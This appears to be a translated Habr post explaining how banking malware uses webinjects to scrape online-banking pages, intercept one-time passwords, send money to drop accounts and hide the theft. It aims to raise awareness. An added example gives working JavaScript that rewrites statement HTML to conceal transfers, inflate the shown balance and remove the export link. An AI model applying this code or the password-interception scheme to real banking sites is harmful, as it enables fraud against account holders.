
Who needs me?

0x00 Preface

Inspired by a recent post about client-bank security. After reading the comments I realized that this topic is apparently poorly covered on Habr. Dedicated to everyone who likes to say "So what if a hacker gets onto my computer?" and "Who needs me anyway?". What actually happens? And, most importantly, how does the money leave the accounts? Interested? Details under the cut.


0x01 Malware, cunning and merciless.

While savvy Habr readers install antiviruses, Linux and other protective tools, the authors of malware do not sleep and improve their creations day by day. Some of these creations are worthy of admiration: they are elegant and beautiful. And dangerous. If earlier the whole "visible" danger lay in damage to software, today, thanks to the spread of MasterCard and Visa, the criminals' motives have shifted to the financial sphere. Everyone has heard of the legendary Zeus, Conficker and other prominent representatives of the malware "community", yet people still seem not to understand what is happening. Some rely on SSL certificates, others on one-time passwords... Trouble comes from where it was not expected.

With active surfing, picking up malware is not a difficult task. It usually happens through so-called exploit packs: when a person lands on a compromised page (which may well be somebody's personal homepage), a bundle of different attacks is thrown at their browser, the main purpose of which is to drop either the malware itself or its downloader onto the visitor's system. Once the beast has settled in, it waits. It waits for the browser to open an online client-bank in front of it. And then the fun begins.

0x02 Inside the online client bank.

The first time you log into the client-bank from an infected machine, the malware performs reconnaissance of the terrain. Using XSS or any other method (in practice, usually a web inject performed from inside the infected browser itself), it loads JavaScript written for this particular bank, and with its help collects all the information simply by walking the DOM. What is collected? Everything: the cardholder's full name, the balance, the various transfers to and from the account. The aggregated information is then sent to the attackers. After that the malware goes back to sleep and waits for further instructions.

Those further instructions come in the form of information processed by a human: where to send the money, and how much. After that the malware starts waiting again, and this time its goal is to drain your hard-earned money. In this example let us consider everyone's favourite one-time passwords, which give some illusion of security. When it is time to type in a one-time password, the malware cheats: it takes the data from the form and holds it back, so the first password goes "to the side", and the user is shown a nice page about an authorization error and is asked to enter the next one-time password. The second password also never reaches its addressee, but the user now lands in the client-bank, logged in with the first password. Again the malware closely follows the user's actions, comparing the pending operations with the change in the balance. Suppose the balance is enough for the transfers it needs. It waits for the user to log out of the client-bank. After that, without any user intervention, it logs in with the second password and, with a series of POST/GET requests, sends the money to the drop accounts. It saves the delta in the balance and the other data it needs. And waits again.

When the victim visits the client-bank again, the malware substitutes a nice page that accounts for the difference made by the withdrawn money. The victim sees that all the money is in place; the rogue postings are hidden by the next piece of JavaScript, and so are all sorts of buttons like "Save my operations to a text file", etc., so that nothing raises an alarm. Meanwhile the malware watches for the balance to be topped up, and when that happens the emptying scenario runs again. In effect the victim can lose their savings account, and everything saved over a very long period, while thinking that the account is growing.
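What the injected script does on the first visit (scraping the statement) and on later ones (hiding the rogue postings, inflating the shown balance and removing the export link), as an added example that is not code from the original post. It operates on the page as text, the way Zeus-style webinject rules rewrite HTML before the browser renders it; the bank's markup, the account holder and the drop account are all constructed for the example.

```javascript
// Added illustration, not code from the original post: a webinject-style
// rewrite of the bank's statement HTML inside the browser, before the victim
// sees it.  Bank markup, holder and drop account are constructed.

// What the attackers remember between visits (the "delta" from the text).
const ATTACKER_STATE = {
  dropAccount: 'DE00 1234 5678 9012 3456 78',   // constructed drop account
};

// One statement row and the balance field, as the constructed bank renders them.
const ROW_RE = /<tr class="tx">\s*<td>([^<]*)<\/td>\s*<td>([^<]*)<\/td>\s*<td>(-?[\d.]+)<\/td>\s*<\/tr>/g;
const BALANCE_RE = /(<span id="balance">)(-?[\d.]+)(<\/span>)/;

// First visit: reconnaissance.  Everything visible in the page is collected
// so it can be posted to the attackers' server.
function scrapeStatement(html) {
  const holder = (html.match(/<span id="holder">([^<]*)<\/span>/) || [])[1] || null;
  const balance = parseFloat((html.match(BALANCE_RE) || [])[2]);
  const transactions = [];
  for (const m of html.matchAll(ROW_RE)) {
    transactions.push({ date: m[1], counterparty: m[2], amount: parseFloat(m[3]) });
  }
  return { holder, balance, transactions };
}

// Later visits: remove the transfers to the drop account, add their total
// back onto the displayed balance, and drop the "save to text file" link.
function disguiseStatement(html, state) {
  let hidden = 0;
  let out = html.replace(ROW_RE, (row, _date, party, amount) => {
    if (party !== state.dropAccount) return row;
    hidden += -parseFloat(amount);      // outgoing amounts are negative
    return '';
  });
  out = out.replace(BALANCE_RE, (_m, open, shown, close) =>
    open + (parseFloat(shown) + hidden).toFixed(2) + close);
  out = out.replace(/<a id="export"[^>]*>[^<]*<\/a>/, '');
  return { html: out, hidden };
}

// Constructed statement page as the bank would serve it after the theft:
// the real balance is 1500, one 500 transfer went to the drop account.
const SAMPLE_PAGE = `
<span id="holder">Ivan Ivanov</span>
<span id="balance">1500.00</span>
<table>
<tr class="tx"><td>2011-02-10</td><td>Salary Ltd</td><td>2000.00</td></tr>
<tr class="tx"><td>2011-02-12</td><td>DE00 1234 5678 9012 3456 78</td><td>-500.00</td></tr>
</table>
<a id="export" href="/export.txt">Save my operations to a text file</a>
`;

const recon = scrapeStatement(SAMPLE_PAGE);          // sent to the attackers
const shownToVictim = disguiseStatement(SAMPLE_PAGE, ATTACKER_STATE);
console.log(recon.balance, shownToVictim.hidden);    // 1500 500
```

The victim is shown a balance of 2000.00 and a statement with one row, which is exactly why the text warns that a clean-looking statement in an infected browser proves nothing; the check has to come from outside that browser (the bank's own SMS or paper statements, or another machine).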

0x03 Instead of the conclusion

I have deliberately not covered all the types and methods of malware operation against online client-banks, since there are a great many of them and describing them all would be pointless. There are other schemes that differ from the one described here. This information is provided purely for informational purposes, to give some clarity about "safe" online banking. I can only add that almost all modern protection methods are successfully bypassed by carders. So keep your PC clean, be attentive when using an online banking client, and do not assume that nobody needs you.

Source: https://habr.com/ru/post/113787/
